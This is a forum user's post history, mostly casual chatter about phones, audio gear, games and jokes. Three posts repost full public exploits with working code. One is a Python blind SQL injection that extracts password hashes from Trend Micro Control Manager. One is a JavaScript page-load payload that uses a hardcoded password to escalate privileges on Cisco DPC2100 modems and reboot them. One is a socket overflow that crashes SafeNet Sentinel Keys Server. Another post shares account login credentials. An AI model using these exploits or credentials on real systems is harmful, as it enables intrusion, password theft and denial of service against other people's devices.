
LLegoLLaS

Active Members
  • Posts: 2060
  • Days Won: 11

Everything posted by LLegoLLaS

  1. BLU Tank, stand-by up to 1720 h, or I'll sell you a Nokia E63 (complete package)
  2. well... it could have counted as self-defense. If you know how to fight, immobilize him, rupture his spleen without leaving marks
  3. you won't burn anything out. The system has an amplifier. I used my 200W system with my phone. You probably need a Jack > RCA adapter
  4. yes, internet without the phone isn't possible
  5. Hello and welcome
  6. The old man ''declared'' that the winner will be the one who crosses the finish line last. It's like a game of patience; this thing seems OK to me
  7. did he tell them to go around the Earth? (the only thing I can think of right now)
  8. LLegoLLaS

    Steam!

    if you tell me which games they are, maybe I'll take one off your hands
  9. rather than buying adapters and other junk, better to put in some money and get a motherboard
  10. does ''offering a fair price'' mean 10 euros?
  11. hi sweetie. Don't throw up, the soup runs out of you back into the ladle
  12. Python code:

    #!/usr/bin/env python
    # Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
    # Disclosure Date: 09/27/2012
    # Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
    # Contact: research[at]spentera.com
    # Platform: Windows
    # Tested on: Windows 2003 Standard Edition
    # Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
    # References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
    # CVE-ID: CVE-2012-2998

    ### Software Description
    # Trend Micro Control Manager is a centralized security management for the enterprise.
    # The web-based management console tracks security performance, reports malware events and
    # policy violations, and automates routine tasks. New features include a customizable dashboard
    # and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
    # Trend Micro's cloud-based security infrastructure.

    ### Vulnerability Details
    # Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the
    # id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds,
    # which gives us a conclusion that the web application is vulnerable to time-based sql injection.
    # The script below is just a proof of concept, you must get a cookie. This vulnerability will need some
    # attack vectors to be exploited, but it is still a vulnerability.
    # Remember to set the cookie first.

    ### Disclosure Timeline
    # 07/23/2012 - Bug found
    # 07/25/2012 - Reported to CERT/CC
    # 07/26/2012 - Reported to JPCERT/CC
    # 08/14/2012 - Vendor received the vulnerability
    # 09/20/2012 - Vendor acknowledged the vulnerability
    # 09/27/2012 - Public advisory released

    import sys,time,urllib,urllib2

    print """
    #===============================================================#
    |                                                               |
    |   Trend Micro Control Manager BlindSQLi Password Extractor    |
    |                         CVE-2012-2998                         |
    |         by otoy & modpr0be (research[at]spentera.com)         |
    |                                                               |
    #===============================================================#
    """

    host = raw_input("[+] Target IP: ")
    target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)

    #SQLi delay, for remote target increase the delay time (default: 2 seconds)
    delay=2

    cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

    def Hex2Des(item):
        return ord(hex(item).replace('0x',''))

    def konek(m,n):
        #borrow from SQLmap
        query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
               " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

        values = { 'Action': 'View',
                   'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
                   'asc': 'true',
                   'Sort': 7,
                   'paging': 10 }

        url = "%s?%s" % (target, urllib.urlencode(values))
        req = urllib2.Request(url)
        req.add_header('Cookie', cookie)

        try:
            starttime=time.time()
            response = urllib2.urlopen(req)
            endtime = time.time()
            return int(endtime-starttime)
        except:
            print '\n[-] Uh oh! Exploit fail..'
            sys.exit(0)

    print "[+] Using Time-Based method with %ds delay."%int(delay)
    print "[+] Starting to extract hash from the first user."
    sys.stdout.write('[+] Here is the hash : ')
    sys.stdout.flush()

    starttime = time.time()
    for m in range(1,33):
        for n in range(0,16):
            wkttunggu = konek(m,Hex2Des(n))
            if (wkttunggu < delay):
                sys.stdout.write(chr(Hex2Des(n)))
                sys.stdout.flush()
                break
    endtime = time.time()
    print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

    source: bugsearch.net
  13. ExploitFixes Cisco DPC2100 Denial of Service 2012-09-26 15:05:03

    # Exploit Title: Cisco DPC2100 Denial of Service
    # Date: 09/01/2010
    # Author: Daniel Smith
    # Software Link: Cisco Systems, Inc
    # Version: HW:2.1/SW:v2.0.2r1256-060303
    # Tested on: OSX 10.6/Win7
    # CVE: CVE-2011-1613

    =======================================================
    Information
    =======================================================
    Executing this script on page load will cause the user's modem to restart when they visit the page. This example uses javascript but can just as easily be written in another language to accomplish something similar.

    Attack consists of two parts.

    Part 1 - Privilege Escalation:
    POST: http://192.168.100.1/goform/_aslvl
    PARAMS: SAAccessLevel=2&SAPassword=W2402

    Part 2 - Modem Restart:
    POST: http://192.168.100.1/goform/gscan
    PARAMS: SADownStartingFrequency=705000000

    =======================================================
    Proof of Concept (Javascript)
    =======================================================
    (function() {
        var b=document.getElementsByTagName('body')[0];
        var otherlib=false;

        if(typeof jQuery!='undefined') {
            console.log('This page already using jQuery v'+jQuery.fn.jquery);
        } else if (typeof $=='function') {
            otherlib=true;
        }

        function getScript(url,success){
            var script=document.createElement('script');
            script.src=url;
            var head=document.getElementsByTagName('head')[0],
                done=false;
            // Attach handlers for all browsers
            script.onload=script.onreadystatechange = function(){
                if ( !done && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete') ) {
                    done=true;
                    success();
                    script.onload = script.onreadystatechange = null;
                    head.removeChild(script);
                }
            };
            head.appendChild(script);
        }

        getScript('http://code.jquery.com/jquery-latest.min.js',function() {
            if (typeof jQuery=='undefined') {
                console.log('Sorry, but jQuery wasn\'t able to load');
            } else {
                console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
                $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
                console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
                $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
                console.log('Reboot command sent.');
            }
        });
    })();

    source: bugsearch
  14. user: LLegoLLaS pass: QPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxzQPIWQ9DKxz/13 Like, whoever takes it
  15. # Exploit Title: SafeNet Sentinel Keys Server DoS
    # Date: 10 Sep 2012
    # Exploit Author: retset (https://twitter.com/ret5et)
    # Vendor Homepage: http://www.safenet-inc.com/
    # Version: Sentinel Protection Installer v7.6.5 (sntlkeyssrvr.exe ver. 1.3.1.3)
    # Download link: http://c3.safenet-inc.com/downloads/8/0/804F8C5F-F88F-4443-8871-2AD993DC33DB/Sentinel%20Protection%20Installer%207.6.5.exe
    # Download link: http://www.safenet-inc.com/support-downloads/sentinel-drivers/
    # Tested on: Xp Sp3

    import socket
    import sys

    if len(sys.argv) < 2:
        print "usage: %s host" % sys.argv[0]
        sys.exit(0)

    host = sys.argv[1]
    print host

    req = "#1"
    req += 'A' *0x4093

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,7002))
    s.send(req)
    s.close()

    """
    (5ec.6f0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=0045011c ecx=00000003 edx=00b6bf83 esi=00b70000 edi=0045011c
    eip=0040f89b esp=00b65864 ebp=0000407d iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
    *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
    sntlkeyssrvr+0xf89b:
    0040f89b f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
    """

    source: bugsearch.net
  16. suspiciously many details. Weren't these things supposed to be confidential? Like: Hey, just so you know, tomorrow at 8 I'm breaking into your house. I'll come in through the bathroom
  17. to get the result they describe, there would have to be a small amount of explosive under the chips, detonated when the button is pressed.
  18. those who have laptops.... from the archive I have 3 km between the logo and your mother